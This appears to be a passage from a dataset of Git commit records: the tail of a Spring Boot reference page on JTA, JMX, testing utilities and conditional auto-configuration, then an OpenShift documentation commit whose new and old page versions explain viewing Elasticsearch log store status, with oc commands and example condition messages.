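\n\nAs a sketch, pointing the auto-configuration at a server-managed `DataSource` usually only\nneeds a single property (the JNDI name below is hypothetical):\n\n[source,properties,indent=0]\n----\n\tspring.datasource.jndi-name=java:jboss\/datasources\/customers\n----\n\n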
Spring Boot will attempt to auto-configure\nJMS by looking for a `ConnectionFactory` at the JNDI path `java:\/JmsXA` or\n`java:\/XAConnectionFactory`, and you can use the\n<<boot-features-connecting-to-a-jndi-datasource, `spring.datasource.jndi-name` property>>\nto configure your `DataSource`.\n\n\n\n=== Mixing XA and non-XA JMS connections\nWhen using JTA, the primary JMS `ConnectionFactory` bean will be XA aware and participate\nin distributed transactions. In some situations you might want to process certain JMS\nmessages using a non-XA `ConnectionFactory`. For example, your JMS processing logic might\ntake longer than the XA timeout.\n\nIf you want to use a non-XA `ConnectionFactory` you can inject the\n`nonXaJmsConnectionFactory` bean rather than the `@Primary` `jmsConnectionFactory` bean.\nFor consistency, the `jmsConnectionFactory` bean is also provided using the bean alias\n`xaJmsConnectionFactory`.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ Inject the primary (XA aware) ConnectionFactory\n\t@Autowired\n\tprivate ConnectionFactory defaultConnectionFactory;\n\n\t\/\/ Inject the XA aware ConnectionFactory (uses the alias and injects the same as above)\n\t@Autowired\n\t@Qualifier(\"xaJmsConnectionFactory\")\n\tprivate ConnectionFactory xaConnectionFactory;\n\n\t\/\/ Inject the non-XA aware ConnectionFactory\n\t@Autowired\n\t@Qualifier(\"nonXaJmsConnectionFactory\")\n\tprivate ConnectionFactory nonXaConnectionFactory;\n----\n\n\n\n=== Supporting an alternative embedded transaction manager\nThe {sc-spring-boot}\/jta\/XAConnectionFactoryWrapper.{sc-ext}[`XAConnectionFactoryWrapper`]\nand {sc-spring-boot}\/jta\/XADataSourceWrapper.{sc-ext}[`XADataSourceWrapper`] interfaces\ncan be used to support alternative embedded transaction managers. The interfaces are\nresponsible for wrapping `XAConnectionFactory` and `XADataSource` beans and exposing them\nas regular `ConnectionFactory` and `DataSource` beans which will transparently enroll in\nthe distributed transaction. DataSource and JMS auto-configuration will use JTA variants\nas long as you have a `JtaTransactionManager` bean and appropriate XA wrapper beans\nregistered within your `ApplicationContext`.\n\nThe {sc-spring-boot}\/jta\/BitronixXAConnectionFactoryWrapper.{sc-ext}[BitronixXAConnectionFactoryWrapper]\nand {sc-spring-boot}\/jta\/BitronixXADataSourceWrapper.{sc-ext}[BitronixXADataSourceWrapper]\nprovide good examples of how to write XA wrappers.\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP, etc. If Spring Integration is available on your classpath, it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if `'spring-integration-jmx'` is also on the classpath.\nSee the {sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. 
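\n\nAs an illustration, a bean exposed over JMX might look like the following sketch (the bean\nand its attribute are hypothetical):\n\n[source,java,indent=0]\n----\n\timport java.util.concurrent.atomic.AtomicLong;\n\n\timport org.springframework.jmx.export.annotation.ManagedAttribute;\n\timport org.springframework.jmx.export.annotation.ManagedOperation;\n\timport org.springframework.jmx.export.annotation.ManagedResource;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\t@ManagedResource\n\tpublic class CounterBean {\n\n\t\tprivate final AtomicLong count = new AtomicLong();\n\n\t\t\/\/ Readable attribute in a JMX console\n\t\t@ManagedAttribute\n\t\tpublic long getCount() {\n\t\t\treturn count.get();\n\t\t}\n\n\t\t\/\/ Operation that can be invoked over JMX\n\t\t@ManagedOperation\n\t\tpublic void reset() {\n\t\t\tcount.set(0);\n\t\t}\n\n\t}\n----\n\n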
By default Spring Boot will create an `MBeanServer` with bean id\n'`mbeanServer`' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the {sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module\nunder the `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` '`Starter POM`' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* JUnit -- The de facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat`-style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond '`unit testing`' and start '`integration testing`' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency on `org.springframework:spring-test` directly, or use the\n`spring-boot-starter-test` '`Starter POM`' to pull it in transitively.\n\nIf you have not used the `spring-test` module before, you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext`, so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. 
If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMvc`) by looking for the `@WebAppConfiguration` annotation. (`MockMvc` and\n`@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@IntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time-consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port, you can add environment properties to `@IntegrationTest` as colon- or\nequals-separated name-value pairs, e.g. `@IntegrationTest(\"server.port:9000\")`.\nAdditionally, you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = MyApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application, you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nPlease note that you cannot use the `@SpringApplicationConfiguration` annotation that was\n<<boot-features-testing-spring-boot-applications,described above>> as Spock\nhttps:\/\/code.google.com\/p\/spock\/issues\/detail?id=349[does not find the\n`@ContextConfiguration` meta-annotation]. 
To work around this limitation, you should use\nthe `@ContextConfiguration` annotation directly and configure it to use the Spring\nBoot-specific context loader:\n\n[source,groovy,indent=0]\n----\n\t@ContextConfiguration(loader = SpringApplicationContextLoader.class)\n\tclass ExampleSpec extends Specification {\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes that are generally useful when testing your application are\npackaged as part of `spring-boot`.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that you\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule`, then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is\nuseful in integration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response\nlocation), ignoring cookies (so the template is stateless), and not throwing exceptions\non server-side errors. 
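\n\nFor instance, the two variants might be obtained as in the following sketch (the\ncredentials are placeholders):\n\n[source,java,indent=0]\n----\n\t\/\/ A plain template\n\tprivate RestTemplate template = new TestRestTemplate();\n\n\t\/\/ A template that sends HTTP Basic authentication with each request\n\tprivate RestTemplate authTemplate = new TestRestTemplate(\"user\", \"secret\");\n----\n\n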
It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or later); if you have it on your classpath, the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Developing auto-configuration and using conditions\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked up by\nSpring Boot.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only\napplies when relevant classes are found and when you have not declared your own\n`@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example,\nif you provide web-specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Conditional` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` annotation is one common example that is\nused to allow developers to '`override`' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allow configuration\nto be skipped based on the presence or absence of specific classes. 
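\n\nFor example, the following sketch only contributes its bean when a (hypothetical)\n`AcmeService` class is present on the classpath:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.condition.ConditionalOnClass;\n\timport org.springframework.context.annotation.Bean;\n\timport org.springframework.context.annotation.Configuration;\n\n\t@Configuration\n\t@ConditionalOnClass(AcmeService.class)\n\tpublic class AcmeAutoConfiguration {\n\n\t\t@Bean\n\t\tpublic AcmeService acmeService() {\n\t\t\treturn new AcmeService();\n\t\t}\n\n\t}\n----\n\n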
Because annotation metadata is parsed using http:\/\/asm.ow2.org\/[ASM], you can use the\n`value` attribute to refer to the real class, even though that class might not actually\nappear on the running application classpath. You can also use the `name` attribute if you\nprefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow configuration\nto be skipped based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nNOTE: `@Conditional` annotations are processed when `@Configuration` classes are\nparsed. Auto-configuration `@Configuration` classes are always parsed last (after any user-defined\nbeans); however, if you are using these annotations on regular `@Configuration` classes,\ncare must be taken not to refer to bean definitions that have not yet been created.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web Application Conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be skipped depending on whether the application is a\n'web application'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope, or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be skipped based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section, you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. 
If you have specific questions, take a look at the\n<<howto.adoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8cb7f81116dfe84fc0141aa6d3fbfd02ae1ff371","subject":"RHDEVDOCS-3018 Document: [Logging 5.1]EO shouldn't try to upgrade ES cluster after adding\/removing storage.","message":"RHDEVDOCS-3018 Document: [Logging 5.1]EO shouldn't try to upgrade ES cluster after adding\/removing storage.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cluster-logging-log-store-status-viewing.adoc","new_file":"modules\/cluster-logging-log-store-status-viewing.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/cluster-logging-log-store.adoc\n\n[id=\"cluster-logging-log-store-comp-viewing_{context}\"]\n= Viewing the status of the log store\n\nYou can view the status of your log store.\n\n.Prerequisites\n\n* OpenShift Logging and Elasticsearch must be installed.\n\n.Procedure\n\n. Change to the `openshift-logging` project.\n+\n[source,terminal]\n----\n$ oc project openshift-logging\n----\n\n. To view the status:\n\n.. Get the name of the log store instance:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch\n----\n+\n.Example output\n[source,terminal]\n----\nNAME AGE\nelasticsearch 5h9m\n----\n\n.. Get the log store status:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch <Elasticsearch-instance> -o yaml\n----\n+\nFor example:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch elasticsearch -n openshift-logging -o yaml\n----\n+\nThe output includes information similar to the following:\n+\n.Example output\n[source,terminal]\n----\nstatus: <1>\n cluster: <2>\n activePrimaryShards: 30\n activeShards: 60\n initializingShards: 0\n numDataNodes: 3\n numNodes: 3\n pendingTasks: 0\n relocatingShards: 0\n status: green\n unassignedShards: 0\n clusterHealth: \"\"\n conditions: [] <3>\n nodes: <4>\n - deploymentName: elasticsearch-cdm-zjf34ved-1\n upgradeStatus: {}\n - deploymentName: elasticsearch-cdm-zjf34ved-2\n upgradeStatus: {}\n - deploymentName: elasticsearch-cdm-zjf34ved-3\n upgradeStatus: {}\n pods: <5>\n client:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n data:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n master:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n shardAllocationEnabled: all\n----\n<1> In the output, the cluster status fields appear in the `status` stanza.\n<2> The status of the log store:\n+\n* The number of active primary shards.\n* The number of active shards.\n* The number of shards that are initializing.\n* The number of log store data nodes.\n* The total number of log store nodes.\n* The number of pending tasks.\n* The log store status: `green`, `red`, `yellow`.\n* The number of unassigned shards.\n<3> Any status conditions, if present. 
The log store status indicates the reasons from the scheduler if a pod could not be placed. Any events related to the following conditions are shown:\n* Container Waiting for both the log store and proxy containers.\n* Container Terminated for both the log store and proxy containers.\n* Pod unschedulable.\nAlso, a condition is shown for a number of issues; see *Example condition messages*.\n<4> The log store nodes in the cluster, with `upgradeStatus`.\n<5> The log store client, data, and master pods in the cluster, listed under `failed`, `notReady`, or `ready` state.\n\n[id=\"cluster-logging-elasticsearch-status-message_{context}\"]\n== Example condition messages\n\nThe following are examples of some condition messages from the `Status` section of the Elasticsearch instance.\n\n\/\/ https:\/\/github.com\/openshift\/elasticsearch-operator\/pull\/92\n\nThe following status message indicates that a node has exceeded the configured low watermark, and no shard will be allocated to this node.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-03-15T15:57:22Z\n message: Disk storage usage for node is 27.5gb (36.74%). Shards will be not\n be allocated on this node.\n reason: Disk Watermark Low\n status: \"True\"\n type: NodeStorage\n deploymentName: example-elasticsearch-cdm-0-1\n upgradeStatus: {}\n----\n\nThe following status message indicates that a node has exceeded the configured high watermark, and shards will be relocated to other nodes.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-03-15T16:04:45Z\n message: Disk storage usage for node is 27.5gb (36.74%). Shards will be relocated\n from this node.\n reason: Disk Watermark High\n status: \"True\"\n type: NodeStorage\n deploymentName: example-elasticsearch-cdm-0-1\n upgradeStatus: {}\n----\n\nThe following status message indicates that the log store node selector in the CR does not match any nodes in the cluster:\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-04-10T02:26:24Z\n message: '0\/8 nodes are available: 8 node(s) didn''t match node selector.'\n reason: Unschedulable\n status: \"True\"\n type: Unschedulable\n----\n\nThe following status message indicates that the log store CR uses a non-existent persistent volume claim (PVC).\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - last Transition Time: 2019-04-10T05:55:51Z\n message: pod has unbound immediate PersistentVolumeClaims (repeated 5 times)\n reason: Unschedulable\n status: True\n type: Unschedulable\n----\n\nThe following status message indicates that your log store cluster does not have enough nodes to support the redundancy policy.\n\n[source,yaml]\n----\nstatus:\n clusterHealth: \"\"\n conditions:\n - lastTransitionTime: 2019-04-17T20:01:31Z\n message: Wrong RedundancyPolicy selected. Choose different RedundancyPolicy or\n add more nodes with data roles\n reason: Invalid Settings\n status: \"True\"\n type: InvalidRedundancy\n----\n\nThis status message indicates your cluster has too many control plane nodes (also known as the master nodes):\n\n[source,yaml]\n----\nstatus:\n clusterHealth: green\n conditions:\n - lastTransitionTime: '2019-04-17T20:12:34Z'\n message: >-\n Invalid master nodes count. 
Please ensure there are no more than 3 total\n nodes with master roles\n reason: Invalid Settings\n status: 'True'\n type: InvalidMasters\n----\n\n\nThe following status message indicates that Elasticsearch storage does not support the change you tried to make.\n\nFor example:\n[source,yaml]\n----\nstatus:\n clusterHealth: green\n conditions:\n - lastTransitionTime: \"2021-05-07T01:05:13Z\"\n message: Changing the storage structure for a custom resource is not supported\n reason: StorageStructureChangeIgnored\n status: 'True'\n type: StorageStructureChangeIgnored\n----\n\nThe `reason` and `type` fields specify the type of unsupported change:\n\n`StorageClassNameChangeIgnored`:: Unsupported change to the storage class name.\n`StorageSizeChangeIgnored`:: Unsupported change the storage size.\n`StorageStructureChangeIgnored`:: Unsupported change between ephemeral and persistent storage structures.\n+\n[IMPORTANT]\n====\nIf you try to configure the `ClusterLogging` custom resource (CR) to switch from ephemeral to persistent storage, the OpenShift Elasticsearch Operator creates a persistent volume claim (PVC) but does not create a persistent volume (PV). To clear the `StorageStructureChangeIgnored` status, you must revert the change to the `ClusterLogging` CR and delete the PVC.\n====\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/cluster-logging-log-store.adoc\n\n[id=\"cluster-logging-log-store-comp-viewing_{context}\"]\n= Viewing the status of the log store\n\nYou can view the status of your log store.\n\n.Prerequisites\n\n* OpenShift Logging and Elasticsearch must be installed.\n\n.Procedure\n\n. Change to the `openshift-logging` project.\n+\n[source,terminal]\n----\n$ oc project openshift-logging\n----\n\n. To view the status:\n\n.. Get the name of the log store instance:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch\n----\n+\n.Example output\n[source,terminal]\n----\nNAME AGE\nelasticsearch 5h9m\n----\n\n.. 
Get the log store status:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch <Elasticsearch-instance> -o yaml\n----\n+\nFor example:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch elasticsearch -n openshift-logging -o yaml\n----\n+\nThe output includes information similar to the following:\n+\n.Example output\n[source,terminal]\n----\nstatus: <1>\n cluster: <2>\n activePrimaryShards: 30\n activeShards: 60\n initializingShards: 0\n numDataNodes: 3\n numNodes: 3\n pendingTasks: 0\n relocatingShards: 0\n status: green\n unassignedShards: 0\n clusterHealth: \"\"\n conditions: [] <3>\n nodes: <4>\n - deploymentName: elasticsearch-cdm-zjf34ved-1\n upgradeStatus: {}\n - deploymentName: elasticsearch-cdm-zjf34ved-2\n upgradeStatus: {}\n - deploymentName: elasticsearch-cdm-zjf34ved-3\n upgradeStatus: {}\n pods: <5>\n client:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n data:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n master:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n shardAllocationEnabled: all\n----\n<1> In the output, the cluster status fields appear in the `status` stanza.\n<2> The status of the log store: \n+\n* The number of active primary shards.\n* The number of active shards. \n* The number of shards that are initializing.\n* The number of log store data nodes.\n* The total number of log store nodes.\n* The number of pending tasks.\n* The log store status: `green`, `red`, `yellow`.\n* The number of unassigned shards.\n<3> Any status conditions, if present. The log store status indicates the reasons from the scheduler if a pod could not be placed. Any events related to the following conditions are shown:\n* Container Waiting for both the log store and proxy containers.\n* Container Terminated for both the log store and proxy containers.\n* Pod unschedulable.\nAlso, a condition is shown for a number of issues, see *Example condition messages*.\n<4> The log store nodes in the cluster, with `upgradeStatus`. \n<5> The log store client, data, and master pods in the cluster, listed under 'failed`, `notReady` or `ready` state.\n\n[id=\"cluster-logging-elasticsearch-status-message_{context}\"]\n== Example condition messages\n\nThe following are examples of some condition messages from the `Status` section of the Elasticsearch instance.\n\n\/\/ https:\/\/github.com\/openshift\/elasticsearch-operator\/pull\/92\n\nThis status message indicates a node has exceeded the configured low watermark and no shard will be allocated to this node.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-03-15T15:57:22Z\n message: Disk storage usage for node is 27.5gb (36.74%). Shards will be not\n be allocated on this node.\n reason: Disk Watermark Low\n status: \"True\"\n type: NodeStorage\n deploymentName: example-elasticsearch-cdm-0-1\n upgradeStatus: {}\n----\n\nThis status message indicates a node has exceeded the configured high watermark and shards will be relocated to other nodes.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-03-15T16:04:45Z\n message: Disk storage usage for node is 27.5gb (36.74%). 
Shards will be relocated\n from this node.\n reason: Disk Watermark High\n status: \"True\"\n type: NodeStorage\n deploymentName: example-elasticsearch-cdm-0-1\n upgradeStatus: {}\n----\n\nThis status message indicates the log store node selector in the CR does not match any nodes in the cluster:\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-04-10T02:26:24Z\n message: '0\/8 nodes are available: 8 node(s) didn''t match node selector.'\n reason: Unschedulable\n status: \"True\"\n type: Unschedulable\n----\n\nThis status message indicates that the log store CR uses a non-existent PVC.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - last Transition Time: 2019-04-10T05:55:51Z\n message: pod has unbound immediate PersistentVolumeClaims (repeated 5 times)\n reason: Unschedulable\n status: True\n type: Unschedulable\n----\n\nThis status message indicates that your log store cluster does not have enough nodes to support your log store redundancy policy.\n\n[source,yaml]\n----\nstatus:\n clusterHealth: \"\"\n conditions:\n - lastTransitionTime: 2019-04-17T20:01:31Z\n message: Wrong RedundancyPolicy selected. Choose different RedundancyPolicy or\n add more nodes with data roles\n reason: Invalid Settings\n status: \"True\"\n type: InvalidRedundancy\n----\n\nThis status message indicates your cluster has too many control plane nodes (also known as the master nodes):\n\n[source,yaml]\n----\nstatus:\n clusterHealth: green\n conditions:\n - lastTransitionTime: '2019-04-17T20:12:34Z'\n message: >-\n Invalid master nodes count. Please ensure there are no more than 3 total\n nodes with master roles\n reason: Invalid Settings\n status: 'True'\n type: InvalidMasters\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0687f4d318f2edc80d0cfefdf717aec3dd21c475","subject":"Related image block is defined to use image as the key","message":"Related image block is defined to use image as the key\n\nThe value as the yaml key for the image pull spec in related images\nis not correct it should be 